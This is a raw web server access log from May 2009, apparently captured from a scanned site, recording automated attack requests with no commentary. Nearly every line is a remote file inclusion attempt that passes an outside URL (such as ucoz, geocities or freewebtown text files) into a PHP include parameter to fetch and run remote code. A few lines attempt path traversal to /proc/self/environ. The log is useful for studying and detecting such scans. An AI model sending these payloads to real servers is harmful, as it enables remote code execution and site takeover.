124.217.216.86 - - [17/May/2009:12:36:20 -0500] "GET /modules/My_egallery/index.php?basepath=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
124.217.216.86 - - [17/May/2009:12:36:20 -0500] "GET /logs/modules/My_egallery/index.php?basepath=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
124.217.216.86 - - [17/May/2009:12:36:20 -0500] "GET /logs/access_log.1239580800/modules/My_egallery/index.php?basepath=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:26 -0500] "GET /logs/access_log.1225065600//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:26 -0500] "GET /logs/access_log.1235433600//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:26 -0500] "GET /logs/access_log.1229472000//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:26 -0500] "GET /logs/access_log.1235174400//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:26 -0500] "GET /logs/access_log.1232150400//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:26 -0500] "GET /logs/access_log.1226448000//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:26 -0500] "GET /logs/access_log.1224979200//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:32 -0500] "GET /logs/access_log.1238371200//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:32 -0500] "GET /logs/access_log.1231891200//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:32 -0500] "GET /logs/access_log.1239580800//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:32 -0500] "GET /logs/access_log.1227571200//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:32 -0500] "GET /logs/access_log.1231200000//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:33 -0500] "GET /logs/access_log.1215820800//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:33 -0500] "GET /logs/access_log.1236384000//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:33 -0500] "GET /logs/access_log.1225324800//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:35 -0500] "GET /logs/access_log.1232841600//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:35 -0500] "GET /logs/access_log.1238198400//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:35 -0500] "GET /logs/access_log.1234051200//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:35 -0500] "GET /logs/access_log.1233964800//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:35 -0500] "GET /logs/access_log.1230508800//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:35 -0500] "GET /logs/access_log.1235088000//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:36 -0500] "GET /logs/access_log.1232668800//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:36 -0500] "GET /logs/access_log.1230422400//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:36 -0500] "GET /logs/access_log.1235779200//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:36 -0500] "GET /logs/access_log.1231804800//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:40 -0500] "GET /logs/access_log.1233878400//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:40 -0500] "GET /logs/access_log.1233792000//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:40 -0500] "GET /logs/access_log.1231632000//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:40 -0500] "GET /logs/access_log.1230768000//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:40 -0500] "GET /logs/access_log.1234828800//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:40 -0500] "GET /logs/access_log.1238544000//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:40 -0500] "GET /logs/access_log.1237593600//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:40 -0500] "GET /logs/access_log.1234569600//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:40 -0500] "GET /logs/access_log.1230854400//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:48 -0500] "GET /logs/access_log.1228176000//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:48 -0500] "GET /logs/access_log.1238284800//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:48 -0500] "GET /logs/access_log.1229817600//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:48 -0500] "GET /logs/access_log.1236297600//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:48 -0500] "GET /logs/access_log.1236038400//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:48 -0500] "GET /logs/access_log.1237507200//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:48 -0500] "GET /logs/access_log.1232409600//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:49 -0500] "GET /logs/access_log.1226361600//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:53 -0500] "GET /logs/access_log.1231718400//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:53 -0500] "GET /logs/access_log.1226966400//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:53 -0500] "GET /logs/access_log.1232755200//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:53 -0500] "GET /logs/access_log.1238457600//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:54 -0500] "GET /logs/access_log.1236902400//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:36:59 -0500] "GET /logs/access_log.1228003200//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.98.59.178 - - [17/May/2009:12:39:31 -0500] "GET //include/bbs.lib.inc.php?site_path=http://h1.ripway.com/lupa121/makan.txt??? HTTP/1.1" 404 307 "-""Mozilla/3.0 (OS/2; U)"
124.0.55.34 - - [17/May/2009:12:39:38 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
124.0.55.34 - - [17/May/2009:12:39:38 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
124.0.55.34 - - [17/May/2009:12:39:38 -0500] "GET /logs/access_log.1236816000//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
124.0.55.34 - - [17/May/2009:12:39:52 -0500] "GET /logs/access_log.1236902400//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
217.18.76.16 - - [17/May/2009:12:42:02 -0500] "GET /logs/access_log.1239667200//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
62.149.163.198 - - [17/May/2009:12:47:50 -0500] "GET /logs/%20/pollphp/db//booth.php?include_path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 311 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
62.149.163.198 - - [17/May/2009:12:47:50 -0500] "GET /%20/pollphp/db//booth.php?include_path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 306 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
62.149.163.198 - - [17/May/2009:12:47:51 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
62.149.163.198 - - [17/May/2009:12:47:51 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
62.149.163.198 - - [17/May/2009:12:47:51 -0500] "GET /%20/pollphp/db//booth.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 306 "-""XXXXXX"
62.149.163.198 - - [17/May/2009:12:47:51 -0500] "GET /logs/%20/pollphp/db//booth.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 311 "-""XXXXXX"
62.149.163.198 - - [17/May/2009:12:47:51 -0500] "GET /%20/pollphp/db//booth.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""XXXXXX"
62.149.163.198 - - [17/May/2009:12:47:51 -0500] "GET /logs/%20/pollphp/db//booth.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""XXXXXX"
117.110.58.66 - - [17/May/2009:12:50:11 -0500] "GET /logs/access_log.1237161600//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 368 "-""Mozilla/5.0"
117.110.58.66 - - [17/May/2009:12:50:11 -0500] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
117.110.58.66 - - [17/May/2009:12:50:11 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 368 "-""Mozilla/5.0"
117.110.58.66 - - [17/May/2009:12:50:12 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
222.231.24.38 - - [17/May/2009:12:53:31 -0500] "GET /logs/board//include/footer.php?_path[counter]=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:12:53:31 -0500] "GET /logs/board//include/footer.php?_path[counter]=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:12:53:32 -0500] "GET /board//include/footer.php?_path[counter]=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:12:53:32 -0500] "GET /board//include/footer.php?_path[counter]=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
218.27.203.107 - - [17/May/2009:12:53:49 -0500] "GET //pollphp/db//booth.php?include_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:12:53:50 -0500] "GET /logs//pollphp/db//booth.php?include_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:12:53:52 -0500] "GET /logs/access_log.1230076800//pollphp/db//booth.php?include_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:12:53:55 -0500] "GET /logs/access_log.1238371200//pollphp/db//booth.php?include_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
222.231.24.38 - - [17/May/2009:12:54:11 -0500] "GET /logs/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:12:54:12 -0500] "GET /errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:12:54:14 -0500] "GET /logs/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:12:54:14 -0500] "GET /errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.52.2.130 - - [17/May/2009:12:54:18 -0500] "GET //components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.52.2.130 - - [17/May/2009:12:54:18 -0500] "GET /logs/access_log.1240444800//components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.52.2.130 - - [17/May/2009:12:54:18 -0500] "GET /logs//components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
74.52.2.130 - - [17/May/2009:12:54:21 -0500] "GET //components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.52.2.130 - - [17/May/2009:12:54:21 -0500] "GET /logs/access_log.1240444800//components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.52.2.130 - - [17/May/2009:12:54:21 -0500] "GET /logs//components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
62.140.23.192 - - [17/May/2009:12:54:54 -0500] "GET /?custompluginfile[]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
62.140.23.192 - - [17/May/2009:12:54:54 -0500] "GET /logs/access_log.1239148800/?custompluginfile[]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
62.140.23.192 - - [17/May/2009:12:54:56 -0500] "GET /logs/?custompluginfile[]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 200 189698 "-""Mozilla/5.0"
62.140.23.192 - - [17/May/2009:12:54:57 -0500] "GET /?custompluginfile[]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
62.140.23.192 - - [17/May/2009:12:54:57 -0500] "GET /logs/access_log.1239148800/?custompluginfile[]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
62.140.23.192 - - [17/May/2009:12:54:58 -0500] "GET /logs/?custompluginfile[]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 200 189698 "-""Mozilla/5.0"
222.231.24.38 - - [17/May/2009:12:56:20 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:12:56:20 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:12:56:21 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:12:56:21 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
67.205.103.164 - - [17/May/2009:12:57:13 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.205.103.164 - - [17/May/2009:12:57:13 -0500] "GET /logs/access_log.1238889600//guestbook1//admin.php?include_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
67.205.103.164 - - [17/May/2009:12:57:17 -0500] "GET //guestbook1//admin.php?include_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
67.205.103.164 - - [17/May/2009:12:58:06 -0500] "GET /logs/access_log.1239062400//guestbook1//admin.php?include_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
122.116.178.20 - - [17/May/2009:13:02:08 -0500] "GET /logs/access_log.1240358400///arcade.php?phpbb_root_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 322 "-""Mozilla/5.0"
122.116.178.20 - - [17/May/2009:13:02:08 -0500] "GET ///arcade.php?phpbb_root_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 295 "-""Mozilla/5.0"
122.116.178.20 - - [17/May/2009:13:02:08 -0500] "GET /logs///arcade.php?phpbb_root_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 300 "-""Mozilla/5.0"
122.116.178.20 - - [17/May/2009:13:02:08 -0500] "GET /logs/access_log.1240617600///arcade.php?phpbb_root_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 322 "-""Mozilla/5.0"
62.44.79.35 - - [17/May/2009:13:03:00 -0500] "GET /logs/access_log.1239235200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
62.44.79.35 - - [17/May/2009:13:03:00 -0500] "GET /logs/access_log.1239494400/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
62.44.79.35 - - [17/May/2009:13:03:03 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
62.44.79.35 - - [17/May/2009:13:03:03 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
66.187.99.209 - - [17/May/2009:13:03:05 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
66.187.99.209 - - [17/May/2009:13:03:05 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.187.99.209 - - [17/May/2009:13:03:05 -0500] "GET /logs/access_log.1239494400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
66.187.99.209 - - [17/May/2009:13:03:05 -0500] "GET /logs/access_log.1239235200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:13:04:02 -0500] "GET /logs/access_log.1238889600//guestbook1//admin.php?include_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:13:04:02 -0500] "GET //guestbook1//admin.php?include_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:13:04:07 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.187.99.209 - - [17/May/2009:13:04:31 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:13:07:19 -0500] "GET /logs/access_log.1239062400//guestbook1//admin.php?include_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:13:07:41 -0500] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
123.143.98.5 - - [17/May/2009:13:07:42 -0500] "GET /logs/access_log.1238630400//admin/editor2/spaw_control.class.php?spaw_root=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
123.143.98.5 - - [17/May/2009:13:07:42 -0500] "GET /logs/access_log.1236988800//admin/editor2/spaw_control.class.php?spaw_root=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
123.143.98.5 - - [17/May/2009:13:07:42 -0500] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
218.27.203.107 - - [17/May/2009:13:08:12 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:13:08:13 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:13:08:16 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:13:08:38 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:13:09:11 -0500] "GET /logs/access_log.1236643200//admin/editor2/spaw_control.class.php?spaw_root=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
189.156.21.56 - - [17/May/2009:13:09:16 -0500] "GET /logs//errors.php?error=http://tugaspeed.info/idpriv8.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
201.151.58.162 - - [17/May/2009:13:09:19 -0500] "GET //errors.php?error=http://tugaspeed.info/idpriv8.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
123.143.98.5 - - [17/May/2009:13:10:11 -0500] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
123.143.98.5 - - [17/May/2009:13:10:11 -0500] "GET /logs/access_log.1236988800//admin/editor2/spaw_control.class.php?spaw_root=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
123.143.98.5 - - [17/May/2009:13:10:11 -0500] "GET /logs/access_log.1238630400//admin/editor2/spaw_control.class.php?spaw_root=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
123.143.98.5 - - [17/May/2009:13:10:11 -0500] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
123.143.98.5 - - [17/May/2009:13:12:01 -0500] "GET /logs/access_log.1236643200//admin/editor2/spaw_control.class.php?spaw_root=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
196.25.27.90 - - [17/May/2009:13:12:59 -0500] "GET /logs/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.photolive.cz//components/com_joomlalib/standalone/id.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
196.25.27.90 - - [17/May/2009:13:12:59 -0500] "GET /administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.photolive.cz//components/com_joomlalib/standalone/id.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
